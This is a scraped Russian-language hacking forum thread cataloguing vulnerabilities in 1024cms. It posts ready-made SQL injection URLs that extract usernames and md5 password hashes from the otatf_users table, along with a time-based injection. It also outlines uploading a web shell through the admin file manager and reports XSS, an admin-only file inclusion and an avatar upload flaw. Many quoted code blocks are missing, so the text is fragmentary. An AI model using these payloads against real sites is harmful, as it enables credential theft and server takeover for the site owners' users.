![]() |
1024cms
Сайт: www.1024cms.org
Префикс таблиц по умолчанию: otatf_ Алгоритм хеширования: md5($pass) SQLi Движок просто кишит инъекциями и другими уязвимостями. Кстати, он отказывается работать при register_globals=on, это видимо у них предосторожность такая...) Поскольку в противном случае число уязвимостей удвоится.В модуле форума: Код:
http://localhost/1024/index.php?p=viewforum&id=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((select+password+from+otatf_users+limit+0,1),floor(rand(0)*2)))--+PHP код:
Код:
http://localhost/1024/rss.php?t=vp&id=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((select+password+from+otatf_users+limit+0,1),floor(rand(0)*2)))--+PHP код:
Код:
http://localhost/1024/pages/download/admin/ajax/sub/edit_sub_it.php?cat='+union+select+1,concat(username,0x3b,password)+from+otatf_users--+Уязвимый код в \1024\pages\download\admin\ajax\sub\edit_sub_it.ph p: PHP код:
Код:
http://localhost/1024/pages/download/admin/ajax/sub/weight_sub.php?cat='+union+select+1,concat(username,0x3b,password),3+from+otatf_users--+Уязвимый код в \1024\pages\download\admin\ajax\sub\weight_sub.php: PHP код:
Код:
http://localhost/1024/pages/download/admin/ajax/sub/edit_sub_do.php?name=1&type=1&descrip&id=1'+and+sleep(10)--+Уязвимый код в \1024\pages\download\admin\ajax\sub\edit_sub_do.ph p: PHP код:
PHP код:
CE В админке есть разные варианты заливки шелла, например, через файловый менеджер:Код:
http://localhost/1024/admin/index.php?op=files |
Код:
Пассивная XSS В скрипте pages\cinema\ajax :(.Чет заблудился в коде я...).Переменная вообще не фильтруется. ЗЫ: Рядом,кстати,красивый апдейтик в базу происходит...И длина строки передаваемой не фильтруется(а надо оно или нет не знаю).Можно забить базу чем-нибудь...Получится из этого что-нибудь ?) длина поля int(11)))) (выходит 44 байта максимум - 11 * 4) ЗЫЗЫ: всё-таки последнее - имхо глупость) |
Забавную вещь нашёл в чате:).Не знаю,даже,как назвать - двойная xss,активная+пассивная,в общем,бред)):
http://localhost/1024/index.php?p=pm&t=send&u= Вбиваем что-нибудь в поле Recipient(необязательно) и лицезреем всё увеличивающиеся куски хтмл кода.В поле Message получаем XSS при ставновлении окна активным ) Сдаётся мне,дело в этом: PHP код:
Код будет как раз в исходниках: Код:
|
Активка:
Цитата:
LFI: Под админом надо быть. Цитата:
PHP код:
|
Пассивная XSS
Скрипт: /admin/index.php Участок кода: PHP код:
Скрипт: PHP код:
Warning: В некоторых местах аплоада пофиксено,но там есть XSS ). P.S.: Необходимы права админа. ЗЫ: Аватары хранятся в папке /images/avatars/ директории /1024 Остальное в пути ).За кривое оформление заранее извиняюсь,ибо не умею. Вот вся функция upload(),которая взаимодействует со скриптом аплоада аватара,кому интересно: PHP код:
|
Sql injection
Скрипт: PHP код:
Обиженный параметр: id.Буквально в каждой функции(add,reply и т.д.).Наверное,это объясняется тем,что фильтрация там не нужна...в плане того,что админ акками никто не бросается ). Активная XSS Не помню,в каком скрипте,где-то на индексной странице скрипта /admin/index.php Прописывать код там,где выводится надпись по умолчанию: Sorry our site is currently offline for maintenance |
| Время: 02:29 |